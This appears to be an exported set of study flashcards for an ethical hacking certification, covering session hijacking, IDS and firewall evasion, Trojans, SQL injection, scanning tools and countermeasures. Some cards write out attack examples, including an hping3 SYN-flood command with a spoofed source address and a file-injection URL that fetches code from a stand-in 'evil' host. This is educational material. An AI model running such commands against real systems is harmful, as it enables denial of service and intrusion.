Microsoft Vulnerability Research (MSVR) (https://technet.microsoft.com) Security Magazine (https://www.securitymagazine.com) SecurityFocus (https://www.securityfocus.com) Help Net Security (https://www.net-security.org) HackerStorm (http://www.hackerstorm.co.uk) SC Magazine (https://www.scmagazine.com) Computerworld (https://www.computerworld.com) WindowsSecurity (http://www.windowsecurity.com) Exploit Database (https://www.exploit-db.com) CVE Details (https://www.cvedetails.com) Security Tracker (https://securitytracker.com) Vulnerability Lab (https://www.vulnerability-lab.com) D'Crypt (https://www.d-crypt.com) Trend Micro (https://www.trendmicro.com) Rapid7 (https://www.rapid7.com) Dark Reading (https://www.darkreading.com
Session Hijacking Countermeasures
Mitigation of Session Hijacking attacks include several detection techniques and countermeasures that can be implemented including manual and automated processes. Deployment of Defence-in-depth technology, Network monitoring devices such as Intrusion detection System (IDS) and intrution Prevention Systems (IPS) categorized as an automated detection process. Several packet sniffing tools are available that can be used for manual detection.
wired communication : Multimedia over Coax Alliance
MoCA is a type of network protocol that provides a high definition video of home and content related to it over the existing coaxial cable
Hummer
Mobile Trojan runs on Android OS root the phone to gain administrator privileges, and it will add pop-up ads. It then pushes mobile games and installs porn apps in the background. When a user attempts to uninstall them, they will be reinstalled.
Hypervisor Level Rootkit
Modifies boot sequence of machine to load itself instead of original virtual machine or OS. Attackers create these rootkits by exploiting hardware features such as Intel VT and AMD-V. These rootkits runs in Ring-1 and host the operating system of the target machine as a virtual machine and intercept all hardware calls made by the target operating system. This kind of rootkit works by modifying the system's boot sequence and gets loaded instead of the original virtual machine monitor.
Activity Profiling
Monitoring the activities running on a system or network. - activity profiling is measured by comparing it from average traffic rate of a network. Is done based on the average packet rate for a network flow, which consists of consecutive packets with similar packet header information. The higher a flow's average packet rate or activity level, the less time there is between consecutive matching packets. An attack is indicated by -o An increase in activity levels among the network flow clusters -o An increase in the overall number of distinct clusters (DDoS attack One of the major hurdles for an this method is the volume of the traffic. This problem can be overcome by clustering packet flows with similar characteristics.
Passive Wiretapping
Monitors and records the traffic, and gain knowledge of the data it contains
Default Content of Web Servers
Most of the web applications' servers contain default content and functionalities allowing attackers to leverage attacks. Most common -Administrators debug and test functionality -Sample functionality to demonstrate common tasks -Publically accessible powerful functions -Server installation manuals Nikto2 -a vulnerability scanner that is used extensively to identify potential vulnerabilities in web applications and web servers.
Privilege Escalation Using DLL(dynamic library) Hijacking
Most windows apps do not use the fully qualified path when loading an external DLL library instead they search the directory from which they have been loaded first. If attackers can place a malicious DLL file in the app directory it can be executed in place of the real DLL.
Short-range communication : Near-field Communication
NFC is a type of short range communication that uses magnetic field induction to enable communication between two electronic devices. It is basically used in connectionless mobile payment, social networking and in identification of documents or some product.
Covering Tracks on OS
NFTS has a feature called Alternate Data Stream that allows attackers to hide a file behind normal files. CMD c:/SecretFile.txt then c:/LegitFile.txt:SecretFile.txt
NTLM (Windows NT LanManager) Authentication
NTLM (NT LAN Manager) is a default authentication scheme that performs authentication using a challenge/response strategy. Because it does not rely on any official protocol specification, there is no guarantee that it works correctly in every situation consists of two protocols: NTLM authentication protocol and LM authentication protocol
NTLM Authentication Process
NTLM includes three methods of challenge-response authentication: LM, NTLMv1, and NTLMv2, all of which use the same technique for the authentication process. The only difference among them is the level of encryption. In NTLM authentication, the client and server negotiate an authentication protocol. This is accomplished through the Microsoft negotiated Security Support Provider (SSP). 1. The client types the user name and password into the logon window. 2. Windows runs the password through a algorithm and generates a hash for the password that has been entered in the logon window. 3.The client computer sends a login request along with domain name to the domain controller. 4. The domain controller generates a 16-byte random character string called a "nonce" and sends it to the client computer. 5. The client computer encrypts the nonce with a hash of the user password and sends it back to the domain controller. 6. The domain controller retrieves the hash of the user password from the SAM and uses it to encrypt the nonce. The domain controller then compares the encrypted value with the value received from the client. A matching value authenticates the client and the logon is successful.
TCP 139
NetBIOS Session Service (SMB over NetBIOS) -It is used to transfer files over a network. -Systems use this port for both NULL Session establishment and file and printer sharing. -An improperly configuration of this port can allow an intruder to gain unauthorized access to critical system files or the complete file system, resulting in data theft or other malicious activities
what is Hyena?
NetBIOS enumeration tool -It supports management of users, groups (both local and global), shares, domains, computers, services, devices, events, files, printers, print jobs, sessions, open files, disk space, user rights, messaging, exporting, job scheduling, processes, and printing. It shows shares and user log on names for Windows servers and domain controllers
Scanning Tools
NetScanTools Pro -an investigation tool that allows you to troubleshoot, monitor, discover, and detect devices on your network. -SuperScan PRTG Netwrok Monitir OmniPeek MiTeC Network Scanner Mega Ping Global Network Inventory Advanced Port Scanner CurrPorts NEET
SMTP Enumeration Tools
NetScanTools Pro's -SMTP Email Generator tool tests the process of sending an email message through an SMTP server. -It can extract all the common email header parameters including confirm/urgent flags. smtp-user-enum -a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). -Enumeration is performed by inspecting the responses to VRFY, EXPN, and RCPT TO commands. Telnet Vanquish MX Toolbox
Network Discovery and Mapping Tools
Network Topology Mapper tool - allows one to automatically discover and create a network map of the target network. -It is also able to display in-depth connections such as OSI Layer 2 and Layer 3 topology data OpManager The Dud NetSurveyor NetBrain Spiceworks Inventory LANState Friendly Pinger
UDP Hijacking
Network-Level Session Hijacking A connection less hijacking, it does not require any sequence packet between requesting client and host. It's all about sending the response packet before a destination server responds.
Blind Hijacking
Network-Level Session Hijacking Attacker correctly guesses the next ISN of a computer attempting to establish a connection; but the attacker can never see the response.
What is TCP/IP hijacking?
Network-Level Session Hijacking In this approach, the attacker uses spoofed packets to redirect the TCP traffic to his/her own machine. Once this is successful, the victim's connection hangs and the attacker is able to communicate with the host's machine on behalf of the victim. To launch a TCP/IP hijacking attack, both victim and attacker must be on the same network.
IP Spoofing: Source Routed Packets
Network-Level Session Hijacking Technique is useful in gaining unauthorized access to a computer with the help of a trusted host's IP address. allows attackers to create their own acceptable packets to insert into the TCP session. the attacker must inject forged packets into the TCP session before the client can respond. the server receives a packet with the new ISN (initial sequence number). These packets are source-routed to a patched destination IP specified by the attacker.
RST Hijacking
Network-Level Session Hijacking The process of sending Reset (RST) packet to the victim with spoofed source address. Acknowledgment number used in this Reset packet is also predicted. When the victim receives this packet, couldn't identify if the packet is spoofed. Victim resets the connection assuming that the connection reset request was requested by an actual source. This attack can be carried out using a packet crafting tool such as Colasoft's Packet Builder and TCP/IP analysis tool such as tcpdump.
Defend Against Spyware
Never adjust your Internet security setting level too low because it provides many chances for spyware to install on your computer. So, always set your Internet browser security setting to either high or medium for protecting your computer from spyware. Don't open suspicious emails and file attachments received from unknown senders. There is a great likelihood that you will get a virus, freeware, or spyware on the computer. Don't open unknown websites present in spam mail messages, retrieved by search engines, or displayed in pop-up windows because they may mislead you to download spyware. Enable a Firewall to enhance the security level of your computer
Important Scanning Tools
Nmap --is a security scanner for network exploration and hacking. It allows you to discover hosts and services on a computer network, thus creating a "map" of the network. -Attackers use Nmap to extract information such as live hosts on the network, services (application name and version), type of packet filters/firewalls, operating systems, and OS versions Hping2/Hping3 --is a command-line-oriented network scanning and packet crafting tool for the TCP/IP protocol that sends ICMP echo requests and supports TCP, UDP, ICMP, and raw-IP protocols. -It performs network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stacks auditing, and other functions -An attacker studies the behavior of an idle host to gain information about the target, such as the services that the host offers, the ports supporting the services, and the operating system of the target.
Types of Password Attacks
Non-electronic (shoulder surf, social engineering, dumpster diving) Active online (dictionary attack(pre-defined passwords), brute force, hash injection, phishing, trojan, spyware etc) Passive online (sniffing, man-in-the-middle, replay) Offline (rainbow table (table of pre-computed hashes), distributed network attack(using other computers around the world to crack a password))
Bypass FW
Normalization Blind Injection -one of the easiest way to exploit the vulnerability as it replaces WAF signatures with their synonyms by using SQL functions. The following requests allow an attacker to perform SQL injection attack and bypass the firewall. HTTP Parameter Pollution (HPP) - is an easy and effective technique, which effects both server and client having feasibility to override or add HTTP GET/POST parameters by injecting delimiting characters in query strings. HTTP Parameter Fragmentation (HPF) -is basically used with the idea of bypassing security filters as it is capable of operating HTTP data directly. This technique can be used along with HPP by using UNION operator to bypass firewalls. Signature Bypass -An attacker can transform the signature of SQL queries in such a way that a firewall cannot detect them leading to malicious results.
Privilege Escalation Using Dylib Hijacking
OS X allows loading of weak dylibs (dynamic library) dynamically, which allows an attacker to place a malicious dylib in the specified location. OS X provides several legitimate methods such as setting the DYLD_INSERT_LIBRARIES environment variable, which are user specific. These methods force the loader to load malicious libraries automatically into a target running process Attackers can take advantage of such methods to perform various malicious activities such as stealthy persistence, run-time process injection, bypassing security software, bypassing Gatekeeper, etc.
Open-Source and Public Methodologies
OWASP - is the Open Web Application Security Project, which is an open-source application security project that assist the organizations to purchase, develop and maintain software tools, software applications, and knowledge-based documentation for Web application security OSSTMM - is a standard set of penetration tests to achieve security metrics. It is considered to be a de facto standard for the highest level of testing, and it ensures high consistency and remarkable accuracy. Information Systems Security Assessment Framework (ISSAF) - is an open source project aimed to provide in-depth information about how to conduct a penetration test. It is supported by the Open Information Systems Security Group (OISSG). The mission of ISSAF is to "research, develop, publish, and promote a complete and practical generally accepted information systems security assessment framework." The National Institute of Standards and Technology (NIST) - is the federal technology agency that works with industry to develop and apply technology, measurements, and standards.
Cloud Computing
On-demand delivery of IP capabilities where IT infrastructure and applications are provided to subscribers as a metered service over a network
Map the Attack Surface
Once attackers detect the entry points, server-side technologies, and functionalities, they then find their respective vulnerabilities and plan their attack surface area of the target web app. Web application analysis thus helps attackers reduce their attack surface. Attackers consider the following factors to plan their attack.
ID Server-side Functionality
Once server-side technologies are determined, attackers try to identify server-side functionality for the purpose of finding potential vulnerabilities. They examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications. o GNU Wget -is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support. o BlackWidow (http://softbytelabs.com) o Teleport Pro (http://www.tenmax.com)
Defacement Trojans
Once this Trojan spreads over the system, can destroy or change the entire content present in a database. When they attcak websites they physically change their underlying HTML format, Resource editors allow a user to view, edit, extract, and replace strings, bitmaps, logos and icons from any Window program They allow you to view and edit almost any aspect of a compiled Windows program, from the menus to the dialog boxes to the icons and beyond They apply User-styled custom applications to deface Windows application
Protocol Anomaly detection
One way IDS detects Intrusions occurs This detection depends on the anomalies specific to a protocol. It identifies particular flaws between how vendors deploy the TCP/IP protocol. Protocols designs according to RFC specifications, which dictate standard handshakes to permit universal communication. detectors are different from the traditional IDS in how they present alarm
Signature Recognition
One way IDS detects Intrusions occurs This is also known as misuse detection, tries to identify events that indicate an abuse of a system or network. This technique involves first creating models of possible intrusions and then comparing these models with incoming events to make a detection decision. Only attacks should match the model; otherwise, false alarms could occur. compares incoming or outgoing network packets with the binary signatures of known attacks, using simple pattern-matching techniques to detect intrusion.
Anomaly Detection
One way IDS detects Intrusions occurs know as "not-use detection," This can be detected when an event occurs outside the tolerance threshold of normal traffic, therefore any deviation from regular use is an attack detects the intrusion based on the fixed behavioral characteristics In this type of approach, the inability to construct a model thoroughly on a regular network is of concern. These models should be used to check on specific networks.
Exploiting Second-Order SQL Injection
Ooccurs when data input is stored in database and used in processing another SQL query without validating or without using parameterized queries. -The attacker submits a crafted input in an HTTP request -The application saves the input in the database to use it later and gives response to the HTTP request -Now, the attacker submits another request -The web application processes the second request using the first input stored in database and executes the SQL injection query The results of the query in response to the second request are returned to the attacker, if applicable
Apple iOS
Operating system which supports Apple devices such as iPhone, iPod touch, iPad, and Apple TV The user interface is based on the concept of direct manipulation, using multi-touch gestures Applications: Cocoa Touch Media Core Services Core OS
Examples of RSA algorithms
P = 61<= first prime number (destroy this after computing E and D) Q = 53<= second prime number (destroy this after computing E and D) PQ = 3233<= modulus (give this to others) E = 17<= public exponent (give this to others) D = 2753<= private exponent (keep this secret) Your public key is (E,PQ) Your private key is D The encryption function is: encrypt(T) = (T^E) mod PQ = (T^17) mod 3233 The decryption function is: decrypt(C) = (C^D) mod PQ = (C^2753) mod 3233
IDS/Firewall Evasion Techniques
Packet Fragmentation: Here, the attacker sends fragmented probe packets to the intended server which re-assembles it after receiving all the fragments. -SYN/FIN Scanning Using IP Fragment Source Routing: The attacker specifies the routing path for the malformed packet to reach the intended server. IP Address Decoy: IP Address Spoofing: Proxy Server: This is a process in which the attacker uses a chain of proxy servers to hide the actual source of a scan and evade certain IDS/firewall restrictions.
Threats of ARP Poisoning
Packet Sniffing: Sniffs traffic over a network or a part of the network Session Hijacking: Steals valid session information and uses it to gain unauthorized access to an application VoIP Call Tapping: Uses port mirroring which allows the VoIP call tapping unit to monitor all network traffic, and picks only the VoIP traffic to record by MAC address Manipulating Data: ARP spoofing allows attackers to capture and modify data, or stops the flow of traffic MITM Attack: Attacker performs an MITM attack where the attacker resides between the victim and serve Data Interception: Intercepts IP address, MAC address, and VLANs connected to the switch in a network Connection Hijacking: In a network, the hardware addresses are supposed to be unique and fixed, but a host may move when its hostname changes and uses some other protocol. In connection hijacking, an attacker can manipulate a client's connection to take complete control. -connection resetting -stealing passwords -Denial of service Attack
Extracting Info via Error Messages
Parameter tampering- grouping error, type mismatch, blind injection -Parameter tampering- give the attacker information such as name of the database server, structure of the directory, and functions -Determining Database Engine Type -Determining a SELECT Query Structur -Injections -Grouping errors -Type Mismatch -Blind injection
Bastion Host
Part of a firewall Architecture Designed for defending the network against attacks. It acts as a mediator between inside and outside networks. Traffic entering or leaving the network passes through the firewall, it has two interfaces: o Public interface directly connected to the Internet o Private interface connected to the Intranet
Multi-homed Firewall
Part of a firewall Architecture This is a node with multiple NICs that connects to two or more networks It connects each interface to the separate network segments logically and physically. It helps in increasing efficiency and reliability of an IP network. More than three interfaces are present that allow for further subdividing the systems based on the specific security objectives of the organization.
Screened Subnet (DMZ)
Part of a firewall Architecture This is a protected network created with a two-or three-homed firewall behind a screening firewall and is a name commonly used to refer to the DMZ. connect the first interface to the Internet, the second interface to the DMZ, and the third to the intranet. The advantage of this from the intranet is that public requests can be responded to without allowing traffic into the intranet. A disadvantage with the three-homed firewall is that if it compromised, both the DMZ and intranet could also be compromised.
SQL Injection
Passing SQL cmd through a web application for execution by a backend Database This is a textual language used by a database server. Its used to perform operations on the database include INSERT, SELECT, UPDATE, and DELETE. Programmers use these commands to manipulate data in the database server.
Types of Session Hijacking
Passive Session Hijacking -an attacker hijacks a session but sits back and watches and records all the traffic that is being sent forth. A passive attack uses sniffers Active Session Hijacking - the attacker takes over an existing session either by tearing down the connection on one side of the conversation or by actively participating.
Footprinting
Passive-an attacker detects the existence of an AP by sniffing the packets from the airwaves. Active-In this method, the attacker's wireless device sends a probe request with the SSID to see if an AP responds.
How to Defend Against WPA/WPA2 Cracking
Passphrases -sniff the password PMK associated with the "handshake" authentication process, o Select a random passphrase that is not made up of dictionary words o Select a complex passphrase of a minimum of 20 characters in length and change it at regular intervals Client Settings o Use WPA2 with AES/CCMP encryption only o Properly set the client settings (e.g. validate the server, specify server address, do not prompt for new servers, etc.) Additional Controls o Use virtual-private-network (VPN) technology such as Remote Access VPN, Extranet VPN, Intranet VPN, etc. o Implement a Network Access Control (NAC) or Network Access Protection (NAP) solution for additional control over end-user connectivity
Default Passwords
Password provided by the manufacturers of password-protected devices allow the user to access the device during initial setup, and then change the password. Tools o http://open-sez.me o https://www.fortypoundhead.com o https://cirt.net o http://www.defaultpassword.us o http://defaultpasswords.in
Attack Phase of Penetration testing
Penetrate perimeter - Firewall testing -Enumeration - device inventory - Social engineering Acquire target -Active proobe assaults -Vulnerability scans -Trusted systems and process assessment Escalate privileges Execute, implant, retract
Social Engineering Toolkit (SET)
Pentesting Tool an open-source Python-driven tool aimed at penetration testing via social engineering. It is a generic exploit designed to perform advanced attacks against human elements to compromise a target to offer sensitive information. SET categorizes attacks such as email, web, and USB according to the attack vector used to trick humans.
More Countermeasures to Defend Against SQL Injection
Perform automated blackbox injection testing, static source code analysis, and manual penetration testing to probe for vulnerabilities Keep untrusted data separate from commands and queries In the absence of parameterized API, use specific escape syntax for the interpreter to eliminate the special characters Use a secure hash algorithm such as SHA256 to store the user passwords rather than in plaintext Use data access abstraction layer application to enforce secure data access across an entire Ensure that the code tracing and debug messages are removed prior to deploying an application Design the code in such a way it traps and handles exceptions appropriately
BlueBorne Attack
Performed on Bluetooth connections to gain access and take full control of the target device It is a collection of various techniques based on the known vulnerabilities of Bluetooth protocol It is compatible with all software versions and does not require any user interaction or precondition or configuration except that the Bluetooth being active After gaining access to one device, an attacker can penetrate into any corporate network using that device to steal critical information about the organization and spread malware to the nearby devices
Hotspot
Places where wireless networks are available for public use. Refer to areas with Wi-Fi availability, where users can enable Wi-Fi on their devices and connect to the Internet
Desynchronization
Pre-Connection SYN: -This attack is performed by sending an initial SYN before the real connection is established, but with an invalid TCP checksum. -Attackers send fake SYN packets with a completely invalid sequence number to desynchronize the IDS. This stops IDS from monitoring all, legitimate and attack, traffic Post-Connection SYN: -For this technique, attempt to desynchronize the IDS from the actual sequence numbers that the kernel is honoring. --This attack intends to get the IDS to resynchronize its notion of the sequence numbers to the new SYN packet. It will then ignore any data that is a legitimate part of the original stream because it will be awaiting a different sequence number. -Once succeeded in resynchronizing the IDS with a SYN packet, send an RST packet with the new sequence number and close down its notion of the connection
Phases of Penetration Testing
Pre-attack phase Attack phase Post-attack phase.
Rainbow Table Attack
Precomputed table which contains word lists like dictionary files and brute force lists and their hash values. (offline Attack) It uses already-calculated information stored in memory to crack the cryptography.
Procedural steps for Malware Analysis
Preparing Testbed Step 1: Allocate a physical system for the analysis lab Step 2: Install Virtual machine (VMware, Hyper-V, etc.) on the system Step 3: Install guest OSs on the Virtual machine(s) Step 4: Isolate the system from the network by ensuring that the NIC card is in "host only" mode Step 5: Simulate internet services using tools such as iNetSim Step 6: Disable the 'shared folders' and the 'guest isolation' Step 7: Install malware analysis tools Step 8: Generate hash value of each OS and tool Step 9: Copy the malware over to the guest OS Static Analysis 1. File 3. Dynamic Analysis
Malware Analysis
Process of reverse engineering a specific piece of malware in order to determine the origin, functionality, and potential impact of a given type of malware Two types static and dynamic
Types of Security Policies
Promiscuous Policy Permissive Policy Prudent Policy Paranoid Policy
TLS Handshake Protocol
Protocol allows the client and server to authenticate each other and to select an encryption algorithm and cryptographic keys prior to data exchange by the application protocol It provides connection security that has three basic properties: o The peer's identity can be authenticated using asymmetric cryptography. This can be made optional but mostly required for at least one of the peers. o The negotiation of a shared secret is secure. o The negotiation is reliable (*note* - l operates on top of the TLS record layer and is responsible to produce cryptographic parameters of the session state.)
Cloud Security Tools
Qualys Cloud Platform - end to end IT security solution that provides a continuous, always-on assessment of the global security and compliance posture, with visibility across all IP assets irrespective of where they reside. CloudPassage Halo - cloud server security platform with all the security functions you need to safely deploy servers in public and hybrid clouds. Core CloudInspect - core CloudInspect helps validate when cloud deployment is secure and gives actionable remediation information when it is not secured
Web Server Malware Infection Monitoring Tool
QualysGuard Malware Detection Service (MDS) Enterprise Edition -allows organizations to proactively scan their websites for malware, providing automated alerts and in-depth reporting to enable prompt identification and resolution. -enables businesses to scan and manage a large number of sites, preventing website blacklisting. Sucuri Quttera Web Inspector
Hacking Phases
Reconnaissance Scanning Gaining Access Maintaining Access Clearing Tracks
DNS Cache Poisoning
Refers to altering or adding forged DNS records into the DNS resolver cache so that a DNS query is redirected to a malicious site. The DNS system uses cache memory to hold the recently resolved domain names. The attacker populates it with recently used domain names and their respective IP address entries. When a user request is received, the DNS resolver first checks the DNS cache; if the system finds the domain name that the user requested in the cache he resolver will quickly send its respective IP address If the DNS resolver cannot validate that the DNS responses have come from an authoritative source, it will cache the incorrect entries locally and serve them to users who make the same request.
Sheep Dip
Refers to the analysis of suspect files, incoming messages, etc. for malware. The users isolate the sheep-dipped computer from other computers on the network to block any malware from entering the system. Before performing this process, it is important to save all downloaded programs on external media such as CD-ROMs or DVDs. A computer used for sheep dipping should have tools such as port monitors, files monitors, network monitors, and one or more anti-virus programs for performing malware analysis of files, applications, incoming messages, external hardware devices (such as USB, Pen drive, etc.), and so on. (computer is installed with port monitors) analysis of suspect files , incoming messages for malware Process: 1. run user, group permission and process monitors 2. run port and network monitors 3. run device driver and file monitors 4. run registry and kernel monitors
Internet of Things (IoT)
Refers to the network of devices with an IP address that have the capability of sensing, collecting and sending data using embedded sensors, communication hardware and processors Application + Network + Mobile + Cloud = ?
RIR's
Regional Internet Registry: ARIN (American Registry for Internet Numbers) = Canada, Caribbean, USA APNIC (Asia-Pacific Network Information Center) = Asia and Pacific RIPE (Reseaux IP Europeens) = Europe, Middle East, parts of central Asia/North Africa LACNIC (Latin America and Caribbean Network Information Center) = Latin America/Caribbean AfriNIC (African Network Information Center) = Africa
njRAT
Remote Access Trojan Tool Can download and execute additional malware, execute shell commands, read and write registry keys, capture screenshots, log keystrokes, and spy on webcams. can be used to control Botnets (networks of computers), allowing the attacker to update, uninstall, disconnect, restart, close the RAT, and rename its campaign ID Features: - Remotely access victim's computer - Collect victim's information like IP address, hostname, OS, etc. - Manipulate files and system files - Open active remote session providing attacker access to victim machine's command line - Log keystrokes and steal credentials from browsers
SYN,ACK,RST
SYN Scanning uses which flags?
hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood
SYN flood a victim -S - syn scan -a - spoofing an IP -p -port --flood The attacker employs TCP SYN flooding techniques by using spoofed IP addresses to perform DoS
-sS (TCP SYN scan)
SYN scan is the default scan option used for scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.
hping3 -8 50-60 -S 10.0.0.25 -V
SYN scan on ports 50-60 -8 - scan -S - Syn scan -V - Verbose
IDS Evasion
SYN/FIN Scanning Using IP Fragments is what kind of technique?
Vuln Assessment Reports
Scan info Target info Results Facilitates risk identification/assessment/prioritization/remediation pg 158
Stealth Scan
Scan involves resetting the TCP connection between client and server abruptly before completion of the three-way handshake signals, hence, making the connection half open -prevents the service from notifying the incoming connection Also known as the half-open scan and the SYN scan beacuse it only sends the SYN packet Useful for hiding efforts and evading firewalls nmap -sS
IDLE/IPID Header Scan
Scan is a TCP port scan method that you can use to send a spoofed source address to a computer to find out what services are available. -It offers complete blind scanning of a remote host uses a third party to check if a port is open Looks at the IPID to see if there is a repsonse Only works if third party isn't transmitting data Sends a request to the third party to check IPID id; then sends a spoofed packet to the target with a return of the third party; sends a request to the third party again to check if IPID increased.IPID increase of 1 indicates port closedIPID increase of 2 indicates port open IPID increase of anything greater indicatesthe third party was not idle nmap -sI
Static Malware Analysis- Local and Online Malware Scanning
Scan the binary code locally using well-known and up-to-date anti-virus software If the code under analysis is a component of a well-known malware, it may have been already discovered and documented by many anti-virus vendors Can also upload the code to online websites such as VirusTotal to get it scanned by a wide-variety of different scan engines
Web Server Security Scanners
ScanMyServer -is used to find security vulnerabilities in a website or a web server. It can generate comprehensive test reports and also can assists in fixing security problems that might exist in company's website or web server Nikto2 Qualys FreeScan UrlScan
A true positive is a condition occurring when an event triggers an alarm and causes the IDS to react as if a real attack is in progress.
Sean who works as a network administrator has just deployed an IDS in his organization's network. Sean deployed an IDS that generates four types of alerts that include: true positive, false positive, false negative, and true negative.In which of the following conditions does the IDS generate a true positive alert? -A true positive is a condition occurring when an event triggers an alarm when no actual attack is in progress -A true positive is a condition occurring when an IDS fails to react to an actual attack event. -A true positive is a condition occurring when an event triggers an alarm and causes the IDS to react as if a real attack is in progress. -A true positive is a condition occurring when an IDS identifies an activity as acceptable behavior and the activity is acceptable.
A true positive is a condition occurring when an event triggers an alarm and causes the IDS to react as if a real attack is in progress.
Sean who works as a network administrator has just deployed an IDS in his organization's network. Sean deployed an IDS that generates four types of alerts that include: true positive, false positive, false negative, and true negative.In which of the following conditions does the IDS generate a true positive alert? -A true positive is a condition occurring when an event triggers an alarm when no actual attack is in progress. -A true positive is a condition occurring when an IDS identifies an activity as acceptable behavior and the activity is acceptable. -A true positive is a condition occurring when an event triggers an alarm and causes the IDS to react as if a real attack is in progress. -A true positive is a condition occurring when an IDS fails to react to an actual attack event
SIEM
Security Incident and Event Management -also known as security information and event management -performs real-time security operations center (SOC) functions like identifying, monitoring, recording, auditing and analyzing security incidents. -It performs threat detection and security incident response activities and provides security by tracking suspicious end-user behavior activities within a real-time IT environment.
Application-based Point of Attack : Improper SSL Validation
Security loopholes in an application's SSL validation process may allow attackers to circumvent the data security.
Cover Medium - Spam/Email Stego
Sending secret messages hidden in spam pg 205
Buffer Overflow
Sends excessive data to an application that either brings down the application or forces the data sent to the application to run on the host system. The attack crashes a vulnerable system remotely by sending excessive traffic to an application.
Components of IoT : Sensing Technology
Sensors embedded in the devices sense a wide variety of information from their surroundings like temperature, gases, location, working of some industrial machine as well as sensing health data of a patient.
Defend Against HTTP Response Split & Web Cache Poison
Server Admin- o Use latest web server software o Regularly update/patch OS and web server o Run web Vulnerability Scanner App Devs- o Restrict web application access to unique IPs o Disallow carriage return (%0d or \r) and line feed (%0a or \n) characters o Comply to RFC 2616 specifications for HTTP/1.1 Proxy Server- o Avoid sharing incoming TCP connections among different clients o Use different TCP connections with the proxy for different virtual hosts o Implement "maintain request host header" correctl
Rogue DHCP Server Attack
Server impersonates a legitimate server and offers IP addresses and other network information to other clients in the network, acting itself as a default gateway. Can be used to direct the clients to visit fake websites in an attempt to gain their credentials. It can be used to perform MITM attacks such as sniffing.
SQL Injection & Server-side Technologies
Server-side technology smoothly accesses, delivers, stores, and restores information. Include -ASP -ASP.Net -Cold Fusion -JSP -PHP -Python -Ruby on Rails.
Service Hijacking using Network Sniffing
Service Hijacking using this involves interception and monitoring of network traffic sent between two cloud nodes. Unencrypted sensitive data (such as login credentials) during transmission across a network is at higher risk. Attacker uses packet sniffers (e.g., Wireshark, Cain, and Abel) to capture sensitive data such as passwords, session cookies, and other web service-related security configuration such as the UDDI (Universal Description Discovery and Integrity), SOAP (Simple Object Access Protocol), and WSDL (Web Service Description Language) files
HTTP/HTTPS Trojan
Service Protocol Trojan This Trojan can bypass any firewall, and work in reverse, as opposed to a straight HTTP tunnel. They use web-based interfaces and port 80. Execution of these Trojans takes place on the internal host and spawns a child program at a predetermined time Tools -o SHTTPD - a small HTTP Server that can be embedded inside any program. It can be wrapped with a genuine program (game chess.exe), when executed it will turn a computer into an invisible web server. -o HTTP RAT - It can be understood simply as a HTTP Tunnel, except it works in the reverse direction. -o ICMP Trojans -An Attacker can hide the data using covert channels are methods in a protocol that is undetectable. ICMP tunneling uses ICMP echo-request and reply to carry a payload and stealthily access or control the victim's machine
VNC Trojan
Service Protocol Trojan Trojan starts a VNC Server daemon in the infected system (victim) where attacker connects to the victim using any VNC viewer Since VNC program is considered a utility, this Trojan will be difficult to detect using anti-viruses
CxSAST
Session Hijacking Prevention Tool A unique source code analysis solution that provides tools for identifying, tracking, and repairing technical and logical flaws in the source code, such as security vulnerabilities, compliance issues, and business logic problems
Burp Suite
Session Hijacking Tool An integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities. Key components: - An intercepting Proxy, - An application-aware Spider, - An advanced web application Scanner, - An Intruder tool,s - A Repeater tool, s - A Sequencer tool, - The CSRF PoC Generator function
Session Hijacking Process
Session hijacking can be divided into three broad phases: Tracking the connection -The attacker uses a network sniffer to track a victim and host or uses a tool like Nmap to scan the network for a target with a TCP sequence that is easy to predict. Desynchronizing the connection -Desynchronized state occurs when a connection between the target and host is established, or stable with no data transmission or the server's sequence number is not equal to the client's acknowledgment number, or vice versa. Injecting the attacker's packet -Once the attacker has interrupted the connection between the server and the target, he or she can either inject data into the network or actively participate as the man-in-the-middle, passing data from the target to the server, and vice-versa, while reading and injecting data at will
Phases to carry out Session fixation attack:
Session set-up phase: -In this phase, the attacker first obtains a legitimate session ID by establishing a connection with the target web server. Few web servers support the idle session time-out feature. In such cases, the attacker needs to send requests repeatedly in order to keep the established trap session ID alive. Fixation phase: -In this phase, the attacker introduces the session ID to the victim's browser, thus fixing the session. Entrance phase: -In this phase, the attacker waits for the victim to log in into the target web server using the trap session ID and then enter the victim's session.
Types of command injection attacks
Shell Injection o An attacker tries to craft an input string to gain shell access to a web server o Shell Injection functions include *system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start()*, and similar APIs HTML Embedding o This type of attack is used to deface websites virtually. Using this attack, an attacker adds an extra HTML-based content to the vulnerable web application o In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting File Injection o The attacker exploits this vulnerability and injects malicious code into system files *http://www.certifiedhacker.com/vulnerable.php?COLOR=http: //evil/exploit?*
Evasion Technique: Sophisticated Match
Signature matches usually succeed in catching the most common classical matches, such as "OR 1=1".
Related-Key Attack
Similar to the chosen plaintext attack, except the attacker can obtain ciphertexts encrypted under two different keys. Need to obtain the plaintext and matching ciphertext to use it The attack requires that the differing keys be closely related
TCP header contains what?
Six flags that control the transmission of data across a TCP connection. -Four of these flags (namely: SYN, ACK, FIN, and RST) govern the establishment, maintenance, and termination of a connection. -The other two flags (namely: PSH and URG) provide instructions to the system -The size of each flag is 1 bit -When a flag value is set to "1,"that flag is automatically turned on
TippingPoint IPS
Siya is using a tool to defend critical data and applications without affecting performance and productivity. Following are the features of the tool: -Pre-built, real-time reports that display big-picture analyses on traffic, top applications, and filtered attack events. -Permits to see, control, and leverage the rules, shared services, and profiles of all the firewall devices throughout the network. -Comprises of in-line, bump-in-the-wire intrusion prevention system with layer two fallback capabilities. -Gives an overview of current performance for all HP systems in the network, including launch capabilities into targeted management applications by using monitors. Identify the tool used by Siya- Wifi Inspector Zimperium's zIPS™ AlienVault® OSSIM™ TippingPoint IPS
Secure Hashing Algorithm (SHA)
